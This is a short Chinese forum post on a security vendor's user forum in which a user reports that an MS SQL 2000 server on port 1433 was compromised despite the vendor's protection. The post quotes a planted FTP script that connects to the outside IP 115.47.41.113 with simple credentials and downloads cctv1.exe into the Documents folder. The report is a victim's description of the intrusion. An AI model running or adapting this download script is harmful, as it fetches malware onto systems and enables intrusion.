微点交流论坛
» 游客:  注册 | 登录 | 帮助

 

作者:
标题: 微点对1433端口的防御,阻挡失败
hncsl2009
新手上路





积分 24
发帖 24
注册 2010-6-15
#1  微点对1433端口的防御,阻挡失败

系统环境: win2003
防火墙: 微点主动防御
现象:
    一旦启动ms sql2000,采用默认端口1433,运行几分钟,微点就提示有木马侵入(这点很棒的),但是不能阻止原生的木马。检查系统,发现在C:\Documents and Settings目录,被恶意的植入了一个文件onfcctv1.dat,打开后期内容为:
open 115.47.41.113
12345
12345
get cctv1.exe C:\DOCUME~1\oncctv1.exe
bye

手动关闭数据库后,手动删除这些木马程序,系统基本恢复正常(未经深度检测)。

微点为什么不能阻止恶意植入文件呢?

※ ※ ※ 本文纯属【hncsl2009】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2013-8-26 16:46
查看资料  发送邮件  发短消息   编辑帖子



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]


北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号